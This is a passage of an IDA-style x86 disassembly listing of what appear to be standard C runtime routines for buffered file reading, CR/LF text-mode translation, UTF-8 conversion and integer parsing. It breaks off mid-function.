sub_40A03D	proc near		; CODE XREF: sub_403EE2+EDp
					; sub_4091DC+Fp

arg_0		= dword	ptr  4

		push	esi
		mov	esi, [esp+4+arg_0]
		push	edi
		xor	edi, edi
		cmp	esi, edi
		jnz	short loc_40A066
		call	sub_405B83
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		mov	dword ptr [eax], 16h
		call	sub_4032F9
		add	esp, 14h
		jmp	loc_40A157
; ---------------------------------------------------------------------------

loc_40A066:				; CODE XREF: sub_40A03D+Aj
		mov	eax, [esi+0Ch]
		test	al, 83h
		jz	loc_40A157
		test	al, 40h
		jnz	loc_40A157
		test	al, 2
		jz	short loc_40A088
		or	eax, 20h
		mov	[esi+0Ch], eax
		jmp	loc_40A157
; ---------------------------------------------------------------------------

loc_40A088:				; CODE XREF: sub_40A03D+3Ej
		or	eax, 1
		test	ax, 10Ch
		mov	[esi+0Ch], eax
		jnz	short loc_40A09D
		push	esi
		call	sub_40D8AC
		pop	ecx
		jmp	short loc_40A0A2
; ---------------------------------------------------------------------------

loc_40A09D:				; CODE XREF: sub_40A03D+55j
		mov	eax, [esi+8]
		mov	[esi], eax

loc_40A0A2:				; CODE XREF: sub_40A03D+5Ej
		push	dword ptr [esi+18h]
		push	dword ptr [esi+8]
		push	esi
		call	sub_408DD0
		pop	ecx
		push	eax
		call	sub_40A6FF
		add	esp, 0Ch
		cmp	eax, edi
		mov	[esi+4], eax
		jz	loc_40A147
		cmp	eax, 0FFFFFFFFh
		jz	short loc_40A147
		test	byte ptr [esi+0Ch], 82h
		jnz	short loc_40A11D
		push	esi
		call	sub_408DD0
		cmp	eax, 0FFFFFFFFh
		pop	ecx
		jz	short loc_40A108
		push	esi
		call	sub_408DD0
		cmp	eax, 0FFFFFFFEh
		pop	ecx
		jz	short loc_40A108
		push	esi
		call	sub_408DD0
		sar	eax, 5
		push	esi
		lea	edi, ds:435300h[eax*4]
		call	sub_408DD0
		and	eax, 1Fh
		imul	eax, 28h
		add	eax, [edi]
		pop	ecx
		pop	ecx
		jmp	short loc_40A10D
; ---------------------------------------------------------------------------

loc_40A108:				; CODE XREF: sub_40A03D+9Bj
					; sub_40A03D+A7j
		mov	eax, offset dword_423BD0

loc_40A10D:				; CODE XREF: sub_40A03D+C9j
		mov	al, [eax+4]
		and	al, 82h
		cmp	al, 82h
		jnz	short loc_40A11D
		or	dword ptr [esi+0Ch], 2000h

loc_40A11D:				; CODE XREF: sub_40A03D+8Fj
					; sub_40A03D+D7j
		cmp	dword ptr [esi+18h], 200h
		jnz	short loc_40A13A
		mov	eax, [esi+0Ch]
		test	al, 8
		jz	short loc_40A13A
		test	ax, 400h
		jnz	short loc_40A13A
		mov	dword ptr [esi+18h], 1000h

loc_40A13A:				; CODE XREF: sub_40A03D+E7j
					; sub_40A03D+EEj ...
		mov	ecx, [esi]
		dec	dword ptr [esi+4]
		movzx	eax, byte ptr [ecx]
		inc	ecx
		mov	[esi], ecx
		jmp	short loc_40A15A
; ---------------------------------------------------------------------------

loc_40A147:				; CODE XREF: sub_40A03D+80j
					; sub_40A03D+89j
		neg	eax
		sbb	eax, eax
		and	eax, 10h
		add	eax, 10h
		or	[esi+0Ch], eax
		mov	[esi+4], edi

loc_40A157:				; CODE XREF: sub_40A03D+24j
					; sub_40A03D+2Ej ...
		or	eax, 0FFFFFFFFh

loc_40A15A:				; CODE XREF: sub_40A03D+108j
		pop	edi
		pop	esi
		retn
sub_40A03D	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40A15D	proc near		; CODE XREF: sub_40A6FF+9Ap
					; sub_40E422+355p ...

var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= word ptr -8
var_2		= byte ptr -2
var_1		= byte ptr -1
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		sub	esp, 1Ch
		mov	edx, [ebp+arg_8]
		push	esi
		mov	esi, [ebp+arg_0]
		push	0FFFFFFFEh
		pop	eax
		cmp	esi, eax
		mov	[ebp+var_14], eax
		mov	[ebp+var_1C], edx
		jnz	short loc_40A192
		call	sub_405B96
		and	dword ptr [eax], 0
		call	sub_405B83
		mov	dword ptr [eax], 9
		or	eax, 0FFFFFFFFh
		jmp	loc_40A6FC
; ---------------------------------------------------------------------------

loc_40A192:				; CODE XREF: sub_40A15D+18j
		push	edi
		xor	edi, edi
		cmp	esi, edi
		jl	short loc_40A1A1
		cmp	esi, dword_4352E8
		jb	short loc_40A1C8

loc_40A1A1:				; CODE XREF: sub_40A15D+3Aj
		call	sub_405B96
		mov	[eax], edi
		call	sub_405B83
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		mov	dword ptr [eax], 9
		call	sub_4032F9
		add	esp, 14h
		or	eax, 0FFFFFFFFh
		jmp	loc_40A6FB
; ---------------------------------------------------------------------------

loc_40A1C8:				; CODE XREF: sub_40A15D+42j
		mov	eax, esi
		and	esi, 1Fh
		imul	esi, 28h
		sar	eax, 5
		push	ebx
		lea	ebx, ds:435300h[eax*4]
		mov	eax, [ebx]
		add	eax, esi
		mov	cl, [eax+4]
		test	cl, 1
		jnz	short loc_40A1FE
		call	sub_405B96
		mov	[eax], edi
		call	sub_405B83
		mov	dword ptr [eax], 9
		jmp	loc_40A345
; ---------------------------------------------------------------------------

loc_40A1FE:				; CODE XREF: sub_40A15D+88j
		cmp	edx, edi
		mov	[ebp+var_10], edi
		jz	loc_40A6F8
		test	cl, 2
		jnz	loc_40A6F8
		mov	ecx, [ebp+arg_4]
		cmp	ecx, edi
		jz	loc_40A333
		mov	al, [eax+24h]
		add	al, al
		sar	al, 1
		mov	[ebp+var_2], al
		movsx	eax, al
		dec	eax
		jz	loc_40A32B
		dec	eax
		jnz	short loc_40A246
		mov	eax, edx
		not	eax
		test	al, 1
		jz	loc_40A333
		and	edx, 0FFFFFFFEh
		mov	[ebp+arg_8], edx

loc_40A246:				; CODE XREF: sub_40A15D+D5j
		mov	[ebp+var_C], ecx

loc_40A249:				; CODE XREF: sub_40A15D+216j
		mov	ecx, [ebx]
		mov	eax, [ebp+var_C]
		lea	edi, [esi+ecx]
		test	byte ptr [edi+4], 48h
		jz	short loc_40A2CD
		mov	cl, [edi+5]
		cmp	cl, 0Ah
		jz	short loc_40A2CD
		xor	edx, edx
		cmp	[ebp+arg_8], edx
		jz	short loc_40A2CD
		mov	[eax], cl
		mov	ecx, [ebx]
		inc	eax
		dec	[ebp+arg_8]
		cmp	[ebp+var_2], dl
		mov	[ebp+var_10], 1
		mov	byte ptr [esi+ecx+5], 0Ah
		jz	short loc_40A2CD
		mov	ecx, [ebx]
		mov	cl, [esi+ecx+25h]
		cmp	cl, 0Ah
		jz	short loc_40A2CD
		cmp	[ebp+arg_8], edx
		jz	short loc_40A2CD
		mov	[eax], cl
		mov	ecx, [ebx]
		inc	eax
		dec	[ebp+arg_8]
		cmp	[ebp+var_2], 1
		mov	[ebp+var_10], 2
		mov	byte ptr [esi+ecx+25h],	0Ah
		jnz	short loc_40A2CD
		mov	ecx, [ebx]
		mov	cl, [esi+ecx+26h]
		cmp	cl, 0Ah
		jz	short loc_40A2CD
		cmp	[ebp+arg_8], edx
		jz	short loc_40A2CD
		mov	[eax], cl
		mov	ecx, [ebx]
		inc	eax
		dec	[ebp+arg_8]
		mov	[ebp+var_10], 3
		mov	byte ptr [esi+ecx+26h],	0Ah

loc_40A2CD:				; CODE XREF: sub_40A15D+F8j
					; sub_40A15D+100j ...
		push	0
		lea	ecx, [ebp+var_18]
		push	ecx
		push	[ebp+arg_8]
		push	eax
		mov	eax, [ebx]
		push	dword ptr [esi+eax]
		call	ds:off_41D078
		test	eax, eax
		jz	loc_40A6C2
		mov	edi, [ebp+var_18]
		test	edi, edi
		jl	loc_40A6C2
		cmp	edi, [ebp+arg_8]
		ja	loc_40A6C2
		mov	eax, [ebx]
		add	[ebp+var_10], edi
		lea	eax, [esi+eax+4]
		test	byte ptr [eax],	80h
		jz	loc_40A562
		cmp	[ebp+var_2], 2
		jz	loc_40A58C
		test	edi, edi
		jz	short loc_40A397
		mov	ecx, [ebp+var_C]
		cmp	byte ptr [ecx],	0Ah
		jnz	short loc_40A397
		or	byte ptr [eax],	4
		jmp	short loc_40A39A
; ---------------------------------------------------------------------------

loc_40A32B:				; CODE XREF: sub_40A15D+CEj
		mov	eax, edx
		not	eax
		test	al, 1
		jnz	short loc_40A354

loc_40A333:				; CODE XREF: sub_40A15D+BAj
					; sub_40A15D+DDj
		call	sub_405B96
		mov	[eax], edi
		call	sub_405B83
		mov	dword ptr [eax], 16h

loc_40A345:				; CODE XREF: sub_40A15D+9Cj
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		call	sub_4032F9
		add	esp, 14h
		jmp	short loc_40A38F
; ---------------------------------------------------------------------------

loc_40A354:				; CODE XREF: sub_40A15D+1D4j
		mov	eax, edx
		push	4
		pop	ecx
		shr	eax, 1
		cmp	eax, ecx
		mov	[ebp+arg_8], ecx
		jb	short loc_40A365
		mov	[ebp+arg_8], eax

loc_40A365:				; CODE XREF: sub_40A15D+203j
		push	[ebp+arg_8]
		call	sub_407AEA
		cmp	eax, edi
		pop	ecx
		mov	[ebp+var_C], eax
		jnz	loc_40A249
		call	sub_405B83
		mov	dword ptr [eax], 0Ch
		call	sub_405B96
		mov	dword ptr [eax], 8

loc_40A38F:				; CODE XREF: sub_40A15D+1F5j
		or	eax, 0FFFFFFFFh
		jmp	loc_40A6FA
; ---------------------------------------------------------------------------

loc_40A397:				; CODE XREF: sub_40A15D+1BFj
					; sub_40A15D+1C7j
		and	byte ptr [eax],	0FBh

loc_40A39A:				; CODE XREF: sub_40A15D+1CCj
		mov	edi, [ebp+var_C]
		mov	eax, [ebp+var_10]
		add	eax, edi
		cmp	edi, eax
		mov	[ebp+arg_8], edi
		mov	[ebp+var_10], eax
		jnb	loc_40A480

loc_40A3B0:				; CODE XREF: sub_40A15D+306j
		mov	ecx, [ebp+arg_8]
		mov	al, [ecx]
		cmp	al, 1Ah
		jz	loc_40A46B
		cmp	al, 0Dh
		jz	short loc_40A3CD
		mov	[edi], al
		inc	edi
		inc	ecx
		mov	[ebp+arg_8], ecx
		jmp	loc_40A45D
; ---------------------------------------------------------------------------

loc_40A3CD:				; CODE XREF: sub_40A15D+262j
		mov	eax, [ebp+var_10]
		dec	eax
		cmp	ecx, eax
		jnb	short loc_40A3EC
		lea	eax, [ecx+1]
		cmp	byte ptr [eax],	0Ah
		jnz	short loc_40A3E7
		inc	ecx
		inc	ecx
		mov	[ebp+arg_8], ecx

loc_40A3E2:				; CODE XREF: sub_40A15D+2CAj
					; sub_40A15D+2E3j
		mov	byte ptr [edi],	0Ah
		jmp	short loc_40A45C
; ---------------------------------------------------------------------------

loc_40A3E7:				; CODE XREF: sub_40A15D+27Ej
		mov	[ebp+arg_8], eax
		jmp	short loc_40A459
; ---------------------------------------------------------------------------

loc_40A3EC:				; CODE XREF: sub_40A15D+276j
		inc	[ebp+arg_8]
		push	0
		lea	eax, [ebp+var_18]
		push	eax
		push	1
		lea	eax, [ebp+var_1]
		push	eax
		mov	eax, [ebx]
		push	dword ptr [esi+eax]
		call	ds:off_41D078
		test	eax, eax
		jnz	short loc_40A414
		call	ds:dword_41D0EC	; RtlGetLastWin32Error
		test	eax, eax
		jnz	short loc_40A459

loc_40A414:				; CODE XREF: sub_40A15D+2ABj
		cmp	[ebp+var_18], 0
		jz	short loc_40A459
		mov	eax, [ebx]
		test	byte ptr [esi+eax+4], 48h
		jz	short loc_40A437
		cmp	[ebp+var_1], 0Ah
		jz	short loc_40A3E2
		mov	byte ptr [edi],	0Dh
		mov	eax, [ebx]
		mov	cl, [ebp+var_1]
		mov	[esi+eax+5], cl
		jmp	short loc_40A45C
; ---------------------------------------------------------------------------

loc_40A437:				; CODE XREF: sub_40A15D+2C4j
		cmp	edi, [ebp+var_C]
		jnz	short loc_40A442
		cmp	[ebp+var_1], 0Ah
		jz	short loc_40A3E2

loc_40A442:				; CODE XREF: sub_40A15D+2DDj
		push	1
		push	0FFFFFFFFh
		push	0FFFFFFFFh
		push	[ebp+arg_0]
		call	sub_40D06E
		add	esp, 10h
		cmp	[ebp+var_1], 0Ah
		jz	short loc_40A45D

loc_40A459:				; CODE XREF: sub_40A15D+28Dj
					; sub_40A15D+2B5j ...
		mov	byte ptr [edi],	0Dh

loc_40A45C:				; CODE XREF: sub_40A15D+288j
					; sub_40A15D+2D8j
		inc	edi

loc_40A45D:				; CODE XREF: sub_40A15D+26Bj
					; sub_40A15D+2FAj
		mov	eax, [ebp+var_10]
		cmp	[ebp+arg_8], eax
		jb	loc_40A3B0
		jmp	short loc_40A480
; ---------------------------------------------------------------------------

loc_40A46B:				; CODE XREF: sub_40A15D+25Aj
		mov	eax, [ebx]
		lea	eax, [esi+eax+4]
		test	byte ptr [eax],	40h
		jnz	short loc_40A47B
		or	byte ptr [eax],	2
		jmp	short loc_40A480
; ---------------------------------------------------------------------------

loc_40A47B:				; CODE XREF: sub_40A15D+317j
		mov	al, [ecx]
		mov	[edi], al
		inc	edi

loc_40A480:				; CODE XREF: sub_40A15D+24Dj
					; sub_40A15D+30Cj ...
		mov	eax, edi
		sub	eax, [ebp+var_C]
		cmp	[ebp+var_2], 1
		mov	[ebp+var_10], eax
		jnz	loc_40A562
		test	eax, eax
		jz	loc_40A562
		dec	edi
		mov	cl, [edi]
		test	cl, cl
		js	short loc_40A4A7
		inc	edi
		jmp	loc_40A52D
; ---------------------------------------------------------------------------

loc_40A4A7:				; CODE XREF: sub_40A15D+342j
		xor	eax, eax
		inc	eax
		movzx	ecx, cl
		jmp	short loc_40A4BE
; ---------------------------------------------------------------------------

loc_40A4AF:				; CODE XREF: sub_40A15D+368j
		cmp	eax, 4
		jg	short loc_40A4C7
		cmp	edi, [ebp+var_C]
		jb	short loc_40A4C7
		dec	edi
		movzx	ecx, byte ptr [edi]
		inc	eax

loc_40A4BE:				; CODE XREF: sub_40A15D+350j
		cmp	byte_423CB8[ecx], 0
		jz	short loc_40A4AF

loc_40A4C7:				; CODE XREF: sub_40A15D+355j
					; sub_40A15D+35Aj
		mov	dl, [edi]
		movzx	ecx, dl
		movsx	ecx, byte_423CB8[ecx]
		test	ecx, ecx
		jnz	short loc_40A4E4
		call	sub_405B83
		mov	dword ptr [eax], 2Ah
		jmp	short loc_40A55E
; ---------------------------------------------------------------------------

loc_40A4E4:				; CODE XREF: sub_40A15D+378j
		inc	ecx
		cmp	ecx, eax
		jnz	short loc_40A4ED
		add	edi, eax
		jmp	short loc_40A52D
; ---------------------------------------------------------------------------

loc_40A4ED:				; CODE XREF: sub_40A15D+38Aj
		mov	ecx, [ebx]
		add	ecx, esi
		test	byte ptr [ecx+4], 48h
		jz	short loc_40A51B
		inc	edi
		cmp	eax, 2
		mov	[ecx+5], dl
		jl	short loc_40A509
		mov	dl, [edi]
		mov	ecx, [ebx]
		mov	[esi+ecx+25h], dl
		inc	edi

loc_40A509:				; CODE XREF: sub_40A15D+3A1j
		cmp	eax, 3
		jnz	short loc_40A517
		mov	dl, [edi]
		mov	ecx, [ebx]
		mov	[esi+ecx+26h], dl
		inc	edi

loc_40A517:				; CODE XREF: sub_40A15D+3AFj
		sub	edi, eax
		jmp	short loc_40A52D
; ---------------------------------------------------------------------------

loc_40A51B:				; CODE XREF: sub_40A15D+398j
		neg	eax
		cdq
		push	1
		push	edx
		push	eax
		push	[ebp+arg_0]
		call	sub_40D06E
		add	esp, 10h

loc_40A52D:				; CODE XREF: sub_40A15D+345j
					; sub_40A15D+38Ej ...
		mov	eax, [ebp+var_1C]
		sub	edi, [ebp+var_C]
		shr	eax, 1
		push	eax
		push	[ebp+arg_4]
		push	edi
		push	[ebp+var_C]
		push	0
		push	0FDE9h
		call	ds:dword_41D0A0	; MultiByteToWideChar
		test	eax, eax
		mov	[ebp+var_10], eax
		jnz	short loc_40A585
		call	ds:dword_41D0EC	; RtlGetLastWin32Error

loc_40A557:				; CODE XREF: sub_40A15D+58Cj
		push	eax
		call	sub_405BA9
		pop	ecx

loc_40A55E:				; CODE XREF: sub_40A15D+385j
					; sub_40A15D+584j
		or	[ebp+var_14], 0FFFFFFFFh

loc_40A562:				; CODE XREF: sub_40A15D+1ADj
					; sub_40A15D+32Fj ...
		mov	eax, [ebp+var_C]
		cmp	eax, [ebp+arg_4]
		jz	short loc_40A571
		push	eax
		call	sub_4039C3
		pop	ecx

loc_40A571:				; CODE XREF: sub_40A15D+40Bj
		mov	eax, [ebp+var_14]
		cmp	eax, 0FFFFFFFEh
		jnz	loc_40A6FA
		mov	eax, [ebp+var_10]
		jmp	loc_40A6FA
; ---------------------------------------------------------------------------

loc_40A585:				; CODE XREF: sub_40A15D+3F2j
		add	eax, eax
		mov	[ebp+var_10], eax
		jmp	short loc_40A562
; ---------------------------------------------------------------------------

loc_40A58C:				; CODE XREF: sub_40A15D+1B7j
		test	edi, edi
		jz	short loc_40A59E
		mov	ecx, [ebp+var_C]
		cmp	word ptr [ecx],	0Ah
		jnz	short loc_40A59E
		or	byte ptr [eax],	4
		jmp	short loc_40A5A1
; ---------------------------------------------------------------------------

loc_40A59E:				; CODE XREF: sub_40A15D+431j
					; sub_40A15D+43Aj
		and	byte ptr [eax],	0FBh

loc_40A5A1:				; CODE XREF: sub_40A15D+43Fj
		mov	edi, [ebp+var_C]
		mov	eax, [ebp+var_10]
		add	eax, edi
		cmp	edi, eax
		mov	[ebp+arg_8], edi
		mov	[ebp+var_10], eax
		jnb	loc_40A6B7

loc_40A5B7:				; CODE XREF: sub_40A15D+53Aj
		mov	eax, [ebp+arg_8]
		movzx	ecx, word ptr [eax]
		cmp	cx, 1Ah
		jz	loc_40A69F
		cmp	cx, 0Dh
		jz	short loc_40A5DC
		mov	[edi], cx
		inc	edi
		inc	edi
		inc	eax
		inc	eax
		mov	[ebp+arg_8], eax
		jmp	loc_40A691
; ---------------------------------------------------------------------------

loc_40A5DC:				; CODE XREF: sub_40A15D+46Ej
		mov	ecx, [ebp+var_10]
		add	ecx, 0FFFFFFFEh
		cmp	eax, ecx
		jnb	short loc_40A607
		lea	ecx, [eax+2]
		cmp	word ptr [ecx],	0Ah
		jnz	short loc_40A5FF
		add	eax, 4
		mov	[ebp+arg_8], eax

loc_40A5F5:				; CODE XREF: sub_40A15D+4E7j
					; sub_40A15D+513j
		mov	word ptr [edi],	0Ah
		jmp	loc_40A68F
; ---------------------------------------------------------------------------

loc_40A5FF:				; CODE XREF: sub_40A15D+490j
		mov	[ebp+arg_8], ecx
		jmp	loc_40A68A
; ---------------------------------------------------------------------------

loc_40A607:				; CODE XREF: sub_40A15D+487j
		add	[ebp+arg_8], 2
		push	0
		lea	eax, [ebp+var_18]
		push	eax
		push	2
		lea	eax, [ebp+var_8]
		push	eax
		mov	eax, [ebx]
		push	dword ptr [esi+eax]
		call	ds:off_41D078
		test	eax, eax
		jnz	short loc_40A630
		call	ds:dword_41D0EC	; RtlGetLastWin32Error
		test	eax, eax
		jnz	short loc_40A68A

loc_40A630:				; CODE XREF: sub_40A15D+4C7j
		cmp	[ebp+var_18], 0
		jz	short loc_40A68A
		mov	eax, [ebx]
		test	byte ptr [esi+eax+4], 48h
		jz	short loc_40A666
		cmp	[ebp+var_8], 0Ah
		jz	short loc_40A5F5
		mov	word ptr [edi],	0Dh
		mov	eax, [ebx]
		mov	cl, byte ptr [ebp+var_8]
		mov	[esi+eax+5], cl
		mov	eax, [ebx]
		mov	cl, byte ptr [ebp+var_8+1]
		mov	[esi+eax+25h], cl
		mov	eax, [ebx]
		mov	byte ptr [esi+eax+26h],	0Ah
		jmp	short loc_40A68F
; ---------------------------------------------------------------------------

loc_40A666:				; CODE XREF: sub_40A15D+4E0j
		cmp	edi, [ebp+var_C]
		jnz	short loc_40A672
		cmp	[ebp+var_8], 0Ah
		jz	short loc_40A5F5

loc_40A672:				; CODE XREF: sub_40A15D+50Cj
		push	1
		push	0FFFFFFFFh
		push	0FFFFFFFEh
		push	[ebp+arg_0]
		call	sub_40D06E
		add	esp, 10h
		cmp	[ebp+var_8], 0Ah
		jz	short loc_40A691

loc_40A68A:				; CODE XREF: sub_40A15D+4A5j
					; sub_40A15D+4D1j ...
		mov	word ptr [edi],	0Dh

loc_40A68F:				; CODE XREF: sub_40A15D+49Dj
					; sub_40A15D+507j
		inc	edi
		inc	edi

loc_40A691:				; CODE XREF: sub_40A15D+47Aj
					; sub_40A15D+52Bj
		mov	eax, [ebp+var_10]
		cmp	[ebp+arg_8], eax
		jb	loc_40A5B7
		jmp	short loc_40A6B7
; ---------------------------------------------------------------------------

loc_40A69F:				; CODE XREF: sub_40A15D+464j
		mov	ecx, [ebx]
		lea	esi, [esi+ecx+4]
		test	byte ptr [esi],	40h
		jnz	short loc_40A6AF
		or	byte ptr [esi],	2
		jmp	short loc_40A6B7
; ---------------------------------------------------------------------------

loc_40A6AF:				; CODE XREF: sub_40A15D+54Bj
		mov	ax, [eax]
		mov	[edi], ax
		inc	edi
		inc	edi

loc_40A6B7:				; CODE XREF: sub_40A15D+454j
					; sub_40A15D+540j ...
		sub	edi, [ebp+var_C]
		mov	[ebp+var_10], edi
		jmp	loc_40A562
; ---------------------------------------------------------------------------

loc_40A6C2:				; CODE XREF: sub_40A15D+187j
					; sub_40A15D+192j ...
		call	ds:dword_41D0EC	; RtlGetLastWin32Error
		push	5
		pop	esi
		cmp	eax, esi
		jnz	short loc_40A6E6
		call	sub_405B83
		mov	dword ptr [eax], 9
		call	sub_405B96
		mov	[eax], esi
		jmp	loc_40A55E
; ---------------------------------------------------------------------------

loc_40A6E6:				; CODE XREF: sub_40A15D+570j
		cmp	eax, 6Dh
		jnz	loc_40A557
		and	[ebp+var_14], 0
		jmp	loc_40A562
; ---------------------------------------------------------------------------

loc_40A6F8:				; CODE XREF: sub_40A15D+A6j
					; sub_40A15D+AFj
		xor	eax, eax

loc_40A6FA:				; CODE XREF: sub_40A15D+235j
					; sub_40A15D+41Aj ...
		pop	ebx

loc_40A6FB:				; CODE XREF: sub_40A15D+66j
		pop	edi

loc_40A6FC:				; CODE XREF: sub_40A15D+30j
		pop	esi
		leave
		retn
sub_40A15D	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40A6FF	proc near		; CODE XREF: sub_403EE2+C9p
					; sub_40A03D+73p

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	10h
		push	offset dword_4218D0
		call	__SEH_prolog4
		mov	eax, [ebp+arg_0]
		cmp	eax, 0FFFFFFFEh
		jnz	short loc_40A72E
		call	sub_405B96
		and	dword ptr [eax], 0
		call	sub_405B83
		mov	dword ptr [eax], 9

loc_40A726:				; CODE XREF: sub_40A6FF+5Cj
		or	eax, 0FFFFFFFFh
		jmp	loc_40A7CB
; ---------------------------------------------------------------------------

loc_40A72E:				; CODE XREF: sub_40A6FF+12j
		xor	edi, edi
		cmp	eax, edi
		jl	short loc_40A73C
		cmp	eax, dword_4352E8
		jb	short loc_40A75D

loc_40A73C:				; CODE XREF: sub_40A6FF+33j
					; sub_40A6FF+7Cj
		call	sub_405B96
		mov	[eax], edi
		call	sub_405B83
		mov	dword ptr [eax], 9
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		call	sub_4032F9
		add	esp, 14h
		jmp	short loc_40A726
; ---------------------------------------------------------------------------

loc_40A75D:				; CODE XREF: sub_40A6FF+3Bj
		mov	ecx, eax
		sar	ecx, 5
		lea	ebx, ds:435300h[ecx*4]
		mov	esi, eax
		and	esi, 1Fh
		imul	esi, 28h
		mov	ecx, [ebx]
		movzx	ecx, byte ptr [ecx+esi+4]
		and	ecx, 1
		jz	short loc_40A73C
		push	eax
		call	sub_40F19E
		pop	ecx
		mov	[ebp+ms_exc.disabled], edi
		mov	eax, [ebx]
		test	byte ptr [eax+esi+4], 1
		jz	short loc_40A7A6
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	sub_40A15D
		add	esp, 0Ch
		mov	[ebp+var_1C], eax
		jmp	short loc_40A7BC
; ---------------------------------------------------------------------------

loc_40A7A6:				; CODE XREF: sub_40A6FF+8Fj
		call	sub_405B83
		mov	dword ptr [eax], 9
		call	sub_405B96
		mov	[eax], edi
		or	[ebp+var_1C], 0FFFFFFFFh

loc_40A7BC:				; CODE XREF: sub_40A6FF+A5j
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_40A7D1
		mov	eax, [ebp+var_1C]

loc_40A7CB:				; CODE XREF: sub_40A6FF+2Aj
		call	__SEH_epilog4
		retn
sub_40A6FF	endp


; =============== S U B	R O U T	I N E =======================================



sub_40A7D1	proc near		; CODE XREF: sub_40A6FF+C4p
					; DATA XREF: _1fieagrn:004218E8o
		push	dword ptr [ebp+8]
		call	sub_40F23E
		pop	ecx
		retn
sub_40A7D1	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40A7DB	proc near		; CODE XREF: sub_40AA06:loc_40AA25p

var_14		= dword	ptr -14h
var_C		= dword	ptr -0Ch
var_8		= byte ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		sub	esp, 14h
		push	esi
		push	edi
		push	[ebp+arg_0]
		lea	ecx, [ebp+var_14]
		call	sub_402ADF
		mov	eax, [ebp+arg_8]
		mov	esi, [ebp+arg_4]
		xor	edi, edi
		cmp	eax, edi
		jz	short loc_40A7FC
		mov	[eax], esi

loc_40A7FC:				; CODE XREF: sub_40A7DB+1Dj
		cmp	esi, edi
		jnz	short loc_40A82C

loc_40A800:				; CODE XREF: sub_40A7DB+5Aj
					; sub_40A7DB+60j
		call	sub_405B83
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		mov	dword ptr [eax], 16h
		call	sub_4032F9
		add	esp, 14h
		cmp	[ebp+var_8], 0
		jz	short loc_40A825
		mov	eax, [ebp+var_C]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_40A825:				; CODE XREF: sub_40A7DB+41j
		xor	eax, eax
		jmp	loc_40AA02
; ---------------------------------------------------------------------------

loc_40A82C:				; CODE XREF: sub_40A7DB+23j
		cmp	[ebp+arg_C], edi
		jz	short loc_40A83D
		cmp	[ebp+arg_C], 2
		jl	short loc_40A800
		cmp	[ebp+arg_C], 24h
		jg	short loc_40A800

loc_40A83D:				; CODE XREF: sub_40A7DB+54j
		mov	ecx, [ebp+var_14]
		push	ebx
		mov	bl, [esi]
		mov	[ebp+var_4], edi
		lea	edi, [esi+1]

loc_40A849:				; CODE XREF: sub_40A7DB+A5j
		cmp	dword ptr [ecx+0ACh], 1
		jle	short loc_40A869
		lea	eax, [ebp+var_14]
		push	eax
		movzx	eax, bl
		push	8
		push	eax
		call	sub_40CDF4
		mov	ecx, [ebp+var_14]
		add	esp, 0Ch
		jmp	short loc_40A879
; ---------------------------------------------------------------------------

loc_40A869:				; CODE XREF: sub_40A7DB+75j
		mov	edx, [ecx+0C8h]
		movzx	eax, bl
		movzx	eax, byte ptr [edx+eax*2]
		and	eax, 8

loc_40A879:				; CODE XREF: sub_40A7DB+8Cj
		test	eax, eax
		jz	short loc_40A882
		mov	bl, [edi]
		inc	edi
		jmp	short loc_40A849
; ---------------------------------------------------------------------------

loc_40A882:				; CODE XREF: sub_40A7DB+A0j
		cmp	bl, 2Dh
		jnz	short loc_40A88D
		or	[ebp+arg_10], 2
		jmp	short loc_40A892
; ---------------------------------------------------------------------------

loc_40A88D:				; CODE XREF: sub_40A7DB+AAj
		cmp	bl, 2Bh
		jnz	short loc_40A895

loc_40A892:				; CODE XREF: sub_40A7DB+B0j
		mov	bl, [edi]
		inc	edi

loc_40A895:				; CODE XREF: sub_40A7DB+B5j
		mov	eax, [ebp+arg_C]
		test	eax, eax
		jl	loc_40A9E9
		cmp	eax, 1
		jz	loc_40A9E9
		cmp	eax, 24h
		jg	loc_40A9E9
		test	eax, eax
		jnz	short loc_40A8E0
		cmp	bl, 30h
		jz	short loc_40A8C4
		mov	[ebp+arg_C], 0Ah
		jmp	short loc_40A8F8
; ---------------------------------------------------------------------------

loc_40A8C4:				; CODE XREF: sub_40A7DB+DEj
		mov	al, [edi]
		cmp	al, 78h
		jz	short loc_40A8D7
		cmp	al, 58h
		jz	short loc_40A8D7
		mov	[ebp+arg_C], 8
		jmp	short loc_40A8F8
; ---------------------------------------------------------------------------

loc_40A8D7:				; CODE XREF: sub_40A7DB+EDj
					; sub_40A7DB+F1j
		mov	[ebp+arg_C], 10h
		jmp	short loc_40A8EA
; ---------------------------------------------------------------------------

loc_40A8E0:				; CODE XREF: sub_40A7DB+D9j
		cmp	eax, 10h
		jnz	short loc_40A8F8
		cmp	bl, 30h
		jnz	short loc_40A8F8

loc_40A8EA:				; CODE XREF: sub_40A7DB+103j
		mov	al, [edi]
		cmp	al, 78h
		jz	short loc_40A8F4
		cmp	al, 58h
		jnz	short loc_40A8F8

loc_40A8F4:				; CODE XREF: sub_40A7DB+113j
		inc	edi
		mov	bl, [edi]
		inc	edi

loc_40A8F8:				; CODE XREF: sub_40A7DB+E7j
					; sub_40A7DB+FAj ...
		mov	esi, [ecx+0C8h]
		or	eax, 0FFFFFFFFh
		xor	edx, edx
		div	[ebp+arg_C]

loc_40A906:				; CODE XREF: sub_40A7DB+19Dj
